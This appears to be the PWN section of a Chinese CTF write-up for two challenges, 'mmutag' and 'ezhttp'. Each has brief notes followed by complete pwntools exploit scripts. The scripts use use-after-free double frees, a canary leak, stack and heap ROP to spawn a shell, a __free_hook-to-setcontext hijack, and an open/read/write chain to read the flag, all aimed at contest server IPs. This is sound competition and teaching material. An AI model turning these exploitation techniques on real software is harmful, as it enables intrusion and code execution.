PWN
mmutag
最开始会给出栈地址,存在uaf漏洞,并且这里存在栈漏洞:
可以泄漏出canary。
利用uaf申请到栈上,即可劫持返回地址进行rop操作,leak出libc的地址即可用system进行getshell了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
| from pwn import *
p = process("./mmutag")
p = remote("183.129.189.62",60104)
libc = ELF("mmutag").libc
def input_i(data):
p.recvuntil("please input your choice:")
p.sendline("1")
p.recvuntil('please input your introduce ')
p.send(data)
def add(idx,data):
p.recvuntil('please input your choise:')
p.sendline('1')
p.recvuntil('please input your id:')
p.sendline(str(idx))
p.recvuntil('input your content')
p.send(data)
def free(idx):
p.recvuntil('please input your choise:')
p.sendline('2')
p.recvuntil('please input your id:')
p.sendline(str(idx))
def show(data):
p.recvuntil('please input your choise:')
p.sendline('3')
p.send(data)
def exit1():
p.recvuntil('please input your choise:\n')
p.sendline('4')
p.recvuntil("please input you name:")
p.send("aaa")
p.recvuntil("0x")
stack = int(p.recv(12),16)
print hex(stack)
p.recvuntil("please input your choice:\n")
p.sendline("2")
show('b'*0x19)
p.recvuntil("b"*0x18)
canary = u64(p.recv(8))-0x62
print hex(canary)
show(p64(0)+p64(0x7f)+p64(0)+p64(canary))
add(1,'aaaa')
add(2,'aaaa')
free(1)
free(2)
free(1)
add(3,p64(stack -0x40))
add(4,'aaaa')
add(5,'aaaa')
puts_plt = 0x4006B0
puts_got = 0x602020
pop_rdi = 0x0000000000400d23
pop_rsi_r15 = 0x0000000000400d21
read_plt = 0x4006F0
payload = p64(0)+p64(canary)+p64(0)
payload += p64(0x400D1A)
payload += p64(0)
payload += p64(1)
payload += p64(stack+0x28)
payload += p64(0x200)
payload += p64(stack +0x20)
payload += p64(0)
payload += p64(0x400D00)
payload += p64(read_plt)
add(6,payload)
exit1()
payload = ''
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(0x400D1A)
payload += p64(0)
payload += p64(1)
payload += p64(stack+0x78)
payload += p64(0x200)
payload += p64(stack+0x70)
payload += p64(0)
payload += p64(0x400D00)
payload += p64(read_plt)
p.send(payload)
libc.address = u64(p.recv(6)+'\x00\x00')-libc.sym['puts']
print hex(libc.address)
p.send(p64(pop_rdi)+p64(libc.search("/bin/sh").next())+p64(libc.sym['system']))
p.interactive()
|
ezhttp
套了web的堆题,存在uaf漏洞。
结合unsortbin进行io_leak,接着修改__free_hook为setcontext,利用sys_rt_sigprocmask系统调用劫持程序流程,从而进行orw读取flag。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
|
from pwn import *
p = process("./ezhttp",env={"LD_PRELOAD":'./libc-2.27.so'})
p = remote("183.129.189.61",53102)
libc = ELF("./libc-2.27.so")
def add(data):
p.recvuntil("======= Send Http packet to me: ========")
p.send('''
POST /create /
Cookie: user=admin
token: \x0d
\r\n\r\ncontent='''+data+'''
''')
def free(idx):
p.recvuntil("======= Send Http packet to me: ========")
payload = '''
POST /del /
Cookie: user=admin
token: \x0d
\r\n\r\nindex='''+str(idx)+'''
'''
p.send(payload)
def edit(idx,data):
p.recvuntil("======= Send Http packet to me: ========")
p.send('''
POST /edit /
Cookie: user=admin
token: \x0d
\r\n\r\nindex='''+str(idx)+'''&content='''+data+'''
''')
def add2(data):
sleep(1)
p.send('''
POST /create /
Cookie: user=admin
token: \x0d
\r\n\r\ncontent='''+data+'''
''')
def free2(idx):
sleep(1)
payload = '''
POST /del /
Cookie: user=admin
token: \x0d
\r\n\r\nindex='''+str(idx)+'''
'''
p.send(payload)
def edit2(idx,data):
sleep(1)
p.send('''
POST /edit /
Cookie: user=admin
token: \x0d
\r\n\r\nindex='''+str(idx)+'''&content='''+data+'''
''')
libc.address = 0x00007ffff79e2000
add('a'*0xf0)
p.recvuntil("Your gift: 0x")
heap = int(p.recv(12),16)
print hex(heap)
add('a'*0x12)
add('a'*0x100)
for i in range(8):
free(0)
print hex(libc.sym['__free_hook'])
print hex(libc.sym['__malloc_hook'])
print hex(libc.sym['setcontext'])
free(1)
free(1)
free(1)
add(p64(heap-0x10)[:6])
add(p64(heap-0x10)[:6])
add('a'*0x10+'\x80\xe7')
free(1)
free(1)
free(1)
free(1)
add(p64(heap)[:6])
add('\x00')
add('\x00')
add('\xe3')
edit(5,'a'*0x10+'\x60\xe7')
free(1)
free(1)
free(1)
free(1)
add(p64(heap)[:6])
add('\x00')
add('\x00')
add(p64(0xfbad1801)[:6])
edit(9,'\x00')
p.recvuntil(p64(0xfbad1801))
libc.address = u64(p.recv(8))-0x3EC7E3
print hex(libc.address)
free(1)
free(1)
edit(3,p64(libc.sym['__free_hook'])[:6])
add(p64(0)[:6])
add(p64(libc.sym['setcontext'])[:6])
pop_rax = 0x0000000000043a78 +libc.address
pop_rdi = 0x000000000002155f +libc.address
pop_rsi = 0x0000000000023e8a +libc.address
pop_rdx = 0x0000000000001b96 +libc.address
pop_rsi_rbp = 0x000000000007dd9e +libc.address
syscall = 0x00000000000013c0 +libc.address
syscall = 0x11B957 +libc.address
payload = './flag'.ljust(0x8,'\x00')
payload += p64(pop_rdi)
payload += p64(heap+0x120)
payload += p64(pop_rsi)
payload += p64(4)
payload += p64(pop_rdx)
payload += p64(4)
payload += p64(pop_rax)
payload += p64(2)
payload += p64(syscall)
payload += p64(pop_rdi)
payload += p64(4)
payload += p64(pop_rsi)
payload += p64(heap+0x500)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(pop_rax)
payload += p64(0)
payload += p64(syscall)
payload += p64(pop_rsi_rbp)
payload += p64(heap+0x130)
payload += p64(pop_rdi)
payload += p64(pop_rdi+1)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(pop_rsi)
payload += p64(heap+0x500)
payload += p64(pop_rax)
payload += p64(1)
payload += p64(syscall)
print hex(len(payload))
edit(2,payload)
free(2)
p.interactive()
|
